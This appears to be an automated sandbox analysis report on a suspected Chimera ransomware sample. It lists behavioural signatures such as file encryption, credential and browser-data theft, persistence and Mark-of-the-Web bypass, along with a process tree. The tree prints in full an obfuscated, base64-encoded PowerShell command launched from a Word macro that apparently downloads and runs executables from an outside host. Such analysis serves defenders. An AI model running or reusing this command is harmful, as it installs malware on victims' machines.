Resubmissions

14-01-2025 09:10

250114-k48eaatncw 8

14-01-2025 08:58

250114-kxfqpavrdj 10

Analysis

  • max time kernel
    595s
  • max time network
    596s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    14-01-2025 08:58

Errors

Reason
Machine shutdown

General

  • Target

    libcrypto-3-x64.dll

  • Size

    4.5MB

  • MD5

    a9c1f7ca15c65c139bc9d4bf57df2e1e

  • SHA1

    1b1377139a6b289d43a6b1161cd1089ffc817cf9

  • SHA256

    03ec9292dcdfda520638490e11baeefff5ab1b6eb22feb90a22fc771272ce116

  • SHA512

    97f8745dba6330c196de9b822638bfe7f74a86bdcb6726f4bd1d3d917de54f9abcb05163c42255173eac3bde995f0d611af718dbcc0de432b67666bed0c0b073

  • SSDEEP

    98304:Ml+f+K26t8Te5zUeP4xA1CPwDvt3uFGCCQ:4Ctt8Te5zUewxA1CPwDvt3uFGCC

Malware Config

Signatures

  • Chimera 64 IoCs

    Ransomware which infects local and network files, often distributed via Dropbox links.

  • Chimera Ransomware Loader DLL 1 IoCs

    Drops/unpacks executable file which resembles Chimera's Loader.dll.

  • Chimera family
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Renames multiple (3260) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Downloads MZ/PE file
  • Office macro that triggers on suspicious action 1 IoCs

    Office document macro which triggers in special circumstances - often malicious.

  • Drops startup file 12 IoCs
  • Executes dropped EXE 21 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Adds Run key to start application 2 TTPs 15 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 26 IoCs
  • Enumerates connected drives 3 TTPs 42 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 17 IoCs
  • Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 8 IoCs

    When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 36 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 18 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\libcrypto-3-x64.dll,#1
    1⤵
      PID:1060
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
      1⤵
      • Enumerates system info in registry
      • Modifies registry class
      • NTFS ADS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1028
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ff9179f3cb8,0x7ff9179f3cc8,0x7ff9179f3cd8
        2⤵
          PID:2396
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
          2⤵
            PID:2424
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:428
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:8
            2⤵
              PID:4144
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
              2⤵
                PID:4992
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
                2⤵
                  PID:2128
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4608 /prefetch:1
                  2⤵
                    PID:4836
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
                    2⤵
                      PID:4468
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3148
                    • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3496
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
                      2⤵
                        PID:4788
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                        2⤵
                          PID:5060
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:1
                          2⤵
                            PID:3372
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
                            2⤵
                              PID:4060
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1
                              2⤵
                                PID:1056
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
                                2⤵
                                  PID:1248
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
                                  2⤵
                                    PID:2376
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
                                    2⤵
                                      PID:1264
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7148 /prefetch:1
                                      2⤵
                                        PID:1448
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                                        2⤵
                                          PID:4836
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7032 /prefetch:1
                                          2⤵
                                            PID:3788
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
                                            2⤵
                                              PID:280
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1912,1825029446524715971,1198389730707298006,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5908 /prefetch:8
                                              2⤵
                                              • NTFS ADS
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4600
                                            • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                              "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\Kakwa.doc" /o ""
                                              2⤵
                                              • Checks processor information in registry
                                              • Enumerates system info in registry
                                              • Suspicious behavior: AddClipboardFormatListener
                                              • Suspicious use of SetWindowsHookEx
                                              PID:1640
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C p^ow^Ers^HE^lL -e WwBzAFkAUwBUAGUATQAuAFQARQB4AHQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAVQBuAEkAYwBvAGQAZQAuAEcARQBUAHMAVAByAEkAbgBHACgAWwBTAHkAcwB0AGUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgByAG8AbQBCAEEAUwBFADYANABzAHQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAEEAQQBPAHcAQQBnAEEAQwBRAEEAYQBRAEEAcgBBAEMAcwBBAEsAUQBBAGcAQQBIAHMAQQBKAEEAQgBwAEEAQwB3AEEASQBnAEIAZwBBAEcANABBAEkAZwBCADkAQQBIADAAQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAGcAQQBHAFkAQQBkAFEAQgB1AEEARwBNAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAGcAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAFUAQQBZAFEAQgAyAEEASABVAEEASQBBAEEAcwBBAEMAQQBBAEoAQQBCAHcAQQBIAFkAQQBhAEEAQgBuAEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBCAHAAQQBFADAAQQBjAEEAQgB2AEEARgBJAEEAZABBAEEAdABBAEUAMABBAFQAdwBCAEUAQQBGAFUAQQBUAEEAQgBsAEEAQwBBAEEAUQBnAEIASgBBAEgAUQBBAGMAdwBCAFUAQQBIAEkAQQBRAFEAQgB1AEEARgBNAEEAUgBnAEIAbABBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgAwAEEARwBFAEEAVQBnAEIAMABBAEMAMABBAFkAZwBCAHAAQQBIAFEAQQBVAHcAQgBVAEEASABJAEEAUQBRAEIATwBBAEYATQBBAFIAZwBCAGwAQQBGAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAMQBBAEYASQBBAFkAdwBCAEYAQQBDAEEAQQBKAEEAQgAxAEEARwBFAEEAZABnAEIAMQBBAEMAQQBBAEwAUQBCAGsAQQBFAFUAQQBjAHcAQgBVAEEARwBrAEEAVABnAEIAaABBAEgAUQBBAFMAUQBCAHYAQQBHADQAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBBAGcAQQBDAFkAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBCADkAQQBBADAAQQBDAGcAQgAwAEEASABJAEEAZQBRAEIANwBBAEMAUQBBAFoAQQBCADQAQQBIAG8AQQBaAGcAQgA0AEEASABNAEEAYgBnAEIAcQBBAEgAZwBBAFAAUQBCAGIAQQBFAFUAQQBUAGcAQgAyAEEARQBrAEEAVQBnAEIAdgBBAEUANABBAGIAUQBCAEYAQQBHADQAQQBkAEEAQgBkAEEARABvAEEATwBnAEIAbgBBAEUAVQBBAGQAQQBCAEcAQQBHADgAQQBUAEEAQgBFAEEARQBVAEEAYwBnAEIAUQBBAEUARQBBAFYAQQBCAG8AQQBDAGcAQQBKAHcAQgBOAEEARgBrAEEAUgBBAEIAUABBAEcATQBBAFYAUQBCAE4AQQBHAFUAQQBUAGcAQgBVAEEASABNAEEASgB3AEEAcABBAEMAcwBBAEoAdwBCAGMAQQBIAFUAQQBhAGcAQgBvAEEARwA0AEEAWQB3AEIAcgBBAEcARQBBAGEAdwBCADMAQQBHAEUAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEQAcwBBAEQAUQBBAEsAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCAG4AQQBHAEUAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAdABBAEcARQBBAGIAZwBCADAAQQBHADgAQQBiAFEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAGIAQQBCADEAQQBHAE0AQQBhAHcAQQB2AEEASABJAEEAWgBRAEIAdABBAEgASQBBAFkAUQBCAGgAQQBIAFEAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAGsAQQBIAGcAQQBlAGcAQgBtAEEASABnAEEAYwB3AEIAdQBBAEcAbwBBAGUAQQBBADcAQQBBADAAQQBDAGcAQQBrAEEARwA0AEEAYQBnAEIAbgBBAEgARQBBAGUAZwBCAHkAQQBEADAAQQBXAHcAQgBGAEEARwA0AEEAZABnAEIAcABBAEgASQBBAFQAdwBCAHUAQQBFADAAQQBaAFEAQgBPAEEASABRAEEAWABRAEEANgBBAEQAbwBBAFoAdwBCAEYAQQBIAFEAQQBaAGcAQgBQAEEARwB3AEEAWgBBAEIAbABBAEYASQBBAGMAQQBCAEIAQQBIAFEAQQBTAEEAQQBvAEEAQwBjAEEAVABRAEIAWgBBAEgAQQBBAGEAUQBCAEQAQQBGAFEAQQBWAFEAQgB5AEEARQBVAEEAVQB3AEEAbgBBAEMAawBBAEsAdwBBAG4AQQBGAHcAQQBhAEEAQgBoAEEARwBvAEEAWQBRAEIAQQBBAEcARQBBAGMAdwBCAG8AQQBHAEUAQQBhAEEAQgBoAEEASABNAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBEAHMAQQBEAFEAQQBLAEEASABrAEEAWgBRAEIAdABBAEcAUQBBAGEAZwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBaAFEAQgBuAEEARwBFAEEAWQBnAEIANQBBAEgAUQBBAFoAUQBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBiAEEAQgAxAEEARwBNAEEAYQB3AEEAdgBBAEgAQQBBAFkAUQBCAHkAQQBHAEUAQQBZAFEAQgAwAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBiAGcAQgBxAEEARwBjAEEAYwBRAEIANgBBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBmAFEAQgBqAEEARwBFAEEAZABBAEIAagBBAEcAZwBBAGUAdwBCADkAQQBBAD0APQAiACkAKQB8AEkARQBYAA==
                                                3⤵
                                                • Process spawned unexpected child process
                                                PID:804
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powErsHElL -e WwBzAFkAUwBUAGUATQAuAFQARQB4AHQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAVQBuAEkAYwBvAGQAZQAuAEcARQBUAHMAVAByAEkAbgBHACgAWwBTAHkAcwB0AGUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgByAG8AbQBCAEEAUwBFADYANABzAHQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAEEAQQBPAHcAQQBnAEEAQwBRAEEAYQBRAEEAcgBBAEMAcwBBAEsAUQBBAGcAQQBIAHMAQQBKAEEAQgBwAEEAQwB3AEEASQBnAEIAZwBBAEcANABBAEkAZwBCADkAQQBIADAAQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAGcAQQBHAFkAQQBkAFEAQgB1AEEARwBNAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAGcAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAFUAQQBZAFEAQgAyAEEASABVAEEASQBBAEEAcwBBAEMAQQBBAEoAQQBCAHcAQQBIAFkAQQBhAEEAQgBuAEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBCAHAAQQBFADAAQQBjAEEAQgB2AEEARgBJAEEAZABBAEEAdABBAEUAMABBAFQAdwBCAEUAQQBGAFUAQQBUAEEAQgBsAEEAQwBBAEEAUQBnAEIASgBBAEgAUQBBAGMAdwBCAFUAQQBIAEkAQQBRAFEAQgB1AEEARgBNAEEAUgBnAEIAbABBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgAwAEEARwBFAEEAVQBnAEIAMABBAEMAMABBAFkAZwBCAHAAQQBIAFEAQQBVAHcAQgBVAEEASABJAEEAUQBRAEIATwBBAEYATQBBAFIAZwBCAGwAQQBGAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAMQBBAEYASQBBAFkAdwBCAEYAQQBDAEEAQQBKAEEAQgAxAEEARwBFAEEAZABnAEIAMQBBAEMAQQBBAEwAUQBCAGsAQQBFAFUAQQBjAHcAQgBVAEEARwBrAEEAVABnAEIAaABBAEgAUQBBAFMAUQBCAHYAQQBHADQAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBBAGcAQQBDAFkAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBCADkAQQBBADAAQQBDAGcAQgAwAEEASABJAEEAZQBRAEIANwBBAEMAUQBBAFoAQQBCADQAQQBIAG8AQQBaAGcAQgA0AEEASABNAEEAYgBnAEIAcQBBAEgAZwBBAFAAUQBCAGIAQQBFAFUAQQBUAGcAQgAyAEEARQBrAEEAVQBnAEIAdgBBAEUANABBAGIAUQBCAEYAQQBHADQAQQBkAEEAQgBkAEEARABvAEEATwBnAEIAbgBBAEUAVQBBAGQAQQBCAEcAQQBHADgAQQBUAEEAQgBFAEEARQBVAEEAYwBnAEIAUQBBAEUARQBBAFYAQQBCAG8AQQBDAGcAQQBKAHcAQgBOAEEARgBrAEEAUgBBAEIAUABBAEcATQBBAFYAUQBCAE4AQQBHAFUAQQBUAGcAQgBVAEEASABNAEEASgB3AEEAcABBAEMAcwBBAEoAdwBCAGMAQQBIAFUAQQBhAGcAQgBvAEEARwA0AEEAWQB3AEIAcgBBAEcARQBBAGEAdwBCADMAQQBHAEUAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEQAcwBBAEQAUQBBAEsAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCAG4AQQBHAEUAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAdABBAEcARQBBAGIAZwBCADAAQQBHADgAQQBiAFEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAGIAQQBCADEAQQBHAE0AQQBhAHcAQQB2AEEASABJAEEAWgBRAEIAdABBAEgASQBBAFkAUQBCAGgAQQBIAFEAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAGsAQQBIAGcAQQBlAGcAQgBtAEEASABnAEEAYwB3AEIAdQBBAEcAbwBBAGUAQQBBADcAQQBBADAAQQBDAGcAQQBrAEEARwA0AEEAYQBnAEIAbgBBAEgARQBBAGUAZwBCAHkAQQBEADAAQQBXAHcAQgBGAEEARwA0AEEAZABnAEIAcABBAEgASQBBAFQAdwBCAHUAQQBFADAAQQBaAFEAQgBPAEEASABRAEEAWABRAEEANgBBAEQAbwBBAFoAdwBCAEYAQQBIAFEAQQBaAGcAQgBQAEEARwB3AEEAWgBBAEIAbABBAEYASQBBAGMAQQBCAEIAQQBIAFEAQQBTAEEAQQBvAEEAQwBjAEEAVABRAEIAWgBBAEgAQQBBAGEAUQBCAEQAQQBGAFEAQQBWAFEAQgB5AEEARQBVAEEAVQB3AEEAbgBBAEMAawBBAEsAdwBBAG4AQQBGAHcAQQBhAEEAQgBoAEEARwBvAEEAWQBRAEIAQQBBAEcARQBBAGMAdwBCAG8AQQBHAEUAQQBhAEEAQgBoAEEASABNAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBEAHMAQQBEAFEAQQBLAEEASABrAEEAWgBRAEIAdABBAEcAUQBBAGEAZwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBaAFEAQgBuAEEARwBFAEEAWQBnAEIANQBBAEgAUQBBAFoAUQBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBiAEEAQgAxAEEARwBNAEEAYQB3AEEAdgBBAEgAQQBBAFkAUQBCAHkAQQBHAEUAQQBZAFEAQgAwAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBiAGcAQgBxAEEARwBjAEEAYwBRAEIANgBBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBmAFEAQgBqAEEARwBFAEEAZABBAEIAagBBAEcAZwBBAGUAdwBCADkAQQBBAD0APQAiACkAKQB8AEkARQBYAA==
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
